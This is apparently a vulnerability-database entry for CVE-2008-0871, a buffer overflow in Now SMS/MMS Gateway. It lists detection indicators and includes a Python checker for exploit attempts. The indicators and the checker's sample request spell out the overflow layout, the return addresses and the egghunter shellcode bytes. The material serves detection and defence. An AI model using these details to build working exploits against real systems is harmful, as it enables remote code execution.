cbcvebase.
CVE-2008-0871
published 2008-02-21

Priority: P3 · 54 · medium · CVSS 2.0 base score 6.8
CVSS 2.0 vector: AV:N/AC:M/Au:N/C:P/I:P/A:P
Exploit: public exploit available (Metasploit module and exploit-db PoC, see Detection & IOCs)
EPSS: 32.79% (98.1st percentile)
Multiple stack-based buffer overflows in Now SMS/MMS Gateway 2007.06.27 and earlier allow remote attackers to execute arbitrary code via a (1) long password in an Authorization header to the HTTP service or a (2) large packet to the SMPP service.

Affected

1 range
Vendor | Product | Version range | Fixed in
- | nowsms_mms_gateway | <= 2007.06.27 | -

Detection & IOCs (extracted from sources)

port: 8800 (HTTP service)
address: 0x10002f9d (CALL ESP in SMSHMAC.DLL; return address for the 2007.06.27 and 'universal' targets)
address: 0x0027727c (return address for the v5.5 target in the exploit-db PoC)
command: GET / HTTP/1.0 with Authorization: Basic <base64(rand_text_english(129) + ret + payload)>
bytes (the egghunter placed after the return address; an int 0x2e hunter with system call number 2, NtAccessCheckAndAuditAlarm, that loads the tag 'DFXP' into EAX as 0x50584644 and compares it twice with scasd):
\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x44\x46\x58\x50\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7
  • Detect exploitation attempts by monitoring HTTP GET requests to port 8800 on a Now SMS/MMS Gateway whose Authorization: Basic header base64-decodes to more than 129 bytes. The exploit puts the overflow in the password: the Metasploit module sends 129 bytes of filler, then the 4-byte return address, then the egghunter, so the decoded credential is well over 129 bytes, while a legitimate user:password pair is far shorter.
  • The exploit also targets the SMPP service with a single large packet; monitor for anomalously large SMPP PDUs sent to the gateway.
  • The return address 0x10002f9d (CALL ESP in SMSHMAC.DLL) is written little-endian as \x9d\x2f\x00\x10 directly after the 129-byte filler. Because the Authorization value is base64-encoded, this sequence never appears literally on the wire: base64-decode the credential first, then match on the decoded bytes (the 4-byte egghunter prefix \x33\xd2\x66\x81 that follows the address is a second decoded-side match).
  • The egghunter tag 'DFXP' (bytes 0x44 0x46 0x58 0x50, loaded into EAX as 0x50584644) is placed in the User-Agent header. The hunter compares the tag twice (two scasd instructions), so the marker actually present in the User-Agent is the 8-byte string DFXPDFXP, immediately followed by the second-stage payload; match on DFXPDFXP in User-Agent headers of requests to port 8800.
  • Bad characters for the payload encoding include null bytes and the characters that are special in HTTP headers. The exploit sidesteps them by base64-encoding the Authorization value, so the decoded credential can carry arbitrary bytes, including the 0x00 in the return address; detection logic therefore has to run on the decoded value, not on the raw header text.
  • The Metasploit module targets only Now SMS/MMS Gateway v2007.06.27. The exploit-db PoC additionally lists a 'universal' target that reuses the same return address (0x10002f9d) and a v5.5 target that uses 0x0027727c instead.
  • The exploit was tested on Windows 2000 Server; behavior on other Windows versions may differ.
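The detection bullets above, turned into a small offline checker. This is an added example, not code from this page, from the Metasploit module or from the NowSMS project. The port, the two return addresses, the egghunter bytes and the DFXP tag are the IOCs listed above; everything else is an assumption for illustration: the sample requests, the 'A' filler, the credential strings, the header names beyond Authorization and User-Agent, and the NOP bytes standing in for the real second-stage payload are all constructed. It matches on the base64-decoded credential, which is the point the bullets make: the little-endian address and the egghunter are invisible in the raw header text.

```python
"""Offline checker for CVE-2008-0871 exploitation attempts against the
Now SMS/MMS Gateway HTTP service on port 8800, built from the IOCs above.

Added example, not code from the page, the Metasploit module or NowSMS.
The sample requests at the bottom are constructed: filler, credentials and
the NOP placeholder are made up; the return addresses, egghunter bytes and
egg tag are the IOCs listed on the page.
"""
import base64
import binascii
from typing import Dict, List, Optional

NOWSMS_HTTP_PORT = 8800

# Return addresses from the IOCs, keyed by the target they belong to.
RET_ADDRS = {
    0x10002F9D: "CALL ESP in SMSHMAC.DLL (2007.06.27 / 'universal')",
    0x0027727C: "v5.5 target",
}

# The 34-byte int 0x2e egghunter from the IOCs. It loads 0x50584644 into EAX
# ('DFXP' as laid out in memory) and runs scasd twice, so it hunts for the
# 8-byte marker 'DFXPDFXP' followed by the second-stage payload.
EGGHUNTER = (b"\x33\xd2\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05"
             b"\x5a\x74\xef\xb8\x44\x46\x58\x50\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")
EGG_MARKER = b"DFXP" * 2

# The Metasploit module sends 129 bytes of filler before the return address;
# a legitimate user:password credential is far shorter than that.
FILLER_LEN = 129


def parse_request(raw: bytes) -> Dict[str, bytes]:
    """Minimal HTTP/1.x request-head parser: headers keyed by lower-cased
    name, values kept as raw bytes (the body, if any, is ignored)."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    headers: Dict[str, bytes] = {}
    for line in head.split(b"\r\n")[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower().decode("latin-1")] = value.strip()
    return headers


def decode_basic_credential(value: bytes) -> Optional[bytes]:
    """Decoded bytes of an 'Authorization: Basic <b64>' value, or None when
    the scheme is not Basic or the payload is not valid base64."""
    scheme, _, b64 = value.partition(b" ")
    if scheme.lower() != b"basic":
        return None
    try:
        return base64.b64decode(b64.strip(), validate=True)
    except (binascii.Error, ValueError):
        return None


def inspect_request(raw: bytes, dst_port: int) -> List[str]:
    """Findings for one request to dst_port; an empty list means no match."""
    findings: List[str] = []
    if dst_port != NOWSMS_HTTP_PORT:
        return findings
    headers = parse_request(raw)

    cred = decode_basic_credential(headers.get("authorization", b""))
    if cred is not None:
        if len(cred) > FILLER_LEN:
            findings.append(f"oversized Basic credential ({len(cred)} bytes decoded)")
        # Match on decoded bytes: base64 hides \x9d\x2f\x00\x10 and the
        # egghunter in the raw header text.
        for addr, desc in RET_ADDRS.items():
            off = cred.find(addr.to_bytes(4, "little"))
            if off != -1:
                findings.append(f"return address 0x{addr:08x} ({desc}) at decoded offset {off}")
        if EGGHUNTER in cred:
            findings.append("int 0x2e egghunter in decoded credential")

    if EGG_MARKER in headers.get("user-agent", b""):
        findings.append("egg marker DFXPDFXP in User-Agent")
    return findings


def build_request(credential: bytes, user_agent: bytes) -> bytes:
    """Constructed 'GET / HTTP/1.0' request in the shape the IOCs describe."""
    return (b"GET / HTTP/1.0\r\nHost: gateway\r\n"
            b"User-Agent: " + user_agent + b"\r\n"
            b"Authorization: Basic " + base64.b64encode(credential) + b"\r\n\r\n")


# Constructed samples: a normal login and an exploit-shaped request.
BENIGN_REQUEST = build_request(b"admin:s3cret", b"curl/7.0")
EXPLOIT_REQUEST = build_request(
    b"A" * FILLER_LEN + (0x10002F9D).to_bytes(4, "little") + EGGHUNTER,
    EGG_MARKER + b"\x90" * 32,  # NOPs stand in for the real second stage
)

if __name__ == "__main__":
    for label, req in (("benign", BENIGN_REQUEST), ("exploit", EXPLOIT_REQUEST)):
        print(label, inspect_request(req, NOWSMS_HTTP_PORT))
```

The length threshold is tuned to the Metasploit module's 129-byte filler; a PoC with different padding would shift it, so treat FILLER_LEN as a knob rather than a constant. The decoded-side matches (return address, egghunter bytes) are the high-confidence signals; the DFXPDFXP marker on its own is cheap to fake or to trip by accident and is best scored together with an oversized credential on the same connection.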